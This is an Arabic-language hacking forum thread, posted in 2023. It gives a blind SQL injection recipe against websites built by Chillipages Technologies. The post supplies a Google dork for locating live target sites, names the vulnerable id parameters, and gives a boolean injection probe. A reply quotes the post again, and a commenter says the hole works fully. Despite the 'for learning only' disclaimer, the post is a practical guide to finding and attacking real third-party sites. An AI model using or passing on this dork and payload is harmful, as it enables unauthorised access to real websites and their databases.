مضى على الشبكة و يوم من العطاء.
  • تحذير: يجب على كل روّاد الشبكة تشغيل برامج الاختراق داخل الأنظمة الوهمية وهي بهدف التعلم وحماية الأعضاء والتوعية بها

#ثغرة حقن Chillipages Technologies - Blind Sql Injection

ExEExE is verified member.

.:: كبار شخصيات المنتدى ::.
>:: v1p ::<

السمعة:

#Date: 2023-11-15
كود:
#Google Dork: "Site by | Chillipages Technologies"
مثال :)
كود:
Target.com/index.php?lang=1 true

المعامل المصاب: (
كود:
/event-display.php?id=

كود:
in/news-details.php?id=
:
ملاحظة:
الكلمة "in" قبل المجلد تعني "داخل"، لذا يعتمد تفسيرها عليك وعلى فهمك للسياق.
:)


بعد id= قم بحقن المتغير باستخدام الكود التالي لمعرفة ما إذا كان مصابًا:
كود:
%20and%20true--
)



تنويه الغرض تعلم وممارسة فقط لا غير :)
 
التعديل الأخير بواسطة المشرف:
الله يعطيك الف عافيه يارب ما قصرت.
موفقين شباب بالثغرة...
 
  • Like
التفاعلات: ExE
#Date: 2023-11-15
كود:
#Google Dork: "Site by | Chillipages Technologies"
مثال :)
كود:
Target.com/index.php?lang=1 true

براميت مصاب (
كود:
/event-display.php?id=

كود:
in/news-details.php?id=
: ماقبل مجلد يعتبر in يعني هند انت وفهمك :)


بعد id احقن بالمتغير كود هذا لمعرفت اصابه (
كود:
%20and%20true--
)



تنويه الغرض تعلم وممارسه فقط لا غير :)
بارك الله فيك استاذي الكريم, شكرا جزيلا

اخوتي واخواتي في الله الثغرة شغالة %100
 

آخر المشاركات

فانوس

رمضان
عودة
أعلى